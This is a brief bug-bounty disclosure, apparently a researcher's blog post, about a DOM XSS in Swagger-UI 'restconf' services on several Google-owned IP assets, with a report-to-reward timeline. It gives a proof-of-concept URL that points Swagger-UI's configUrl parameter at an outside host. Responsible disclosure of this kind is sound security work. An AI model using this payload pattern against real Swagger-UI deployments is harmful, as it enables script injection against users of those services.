[Google] YouTube "restconf" Swagger-UI XSS

 During my recon, I came across a few Google owned IP assets which were running "restconfig" services hosted on Swagger-UI.

Dawid Moczadło has written a detailed article here.

POC -

Three IP assets on - "https://IP/ui" were vulnerable to DOM XSS on this endpoint -

"/ui/model.html?configUrl=http://hackingmonks/test.json".

The Swagger-UI did show the available API endpoints for the service but had authorisation in place(access_token was needed).

During this period, I had found 4th asset which had the same vulnerability along with additional exploitation, which was reported in another ticket. The write-up can be found here(Access to BGP server + DOM XSS).

Timeline -

Reported - 22.05.2023

Triaged - 22.05.2023

The assets were no longer accessible to the public - 09.06.2023

Accepted - 07.06.2023

Rewarded - 13.06.2023

Google's date for the fix - 08.12.2023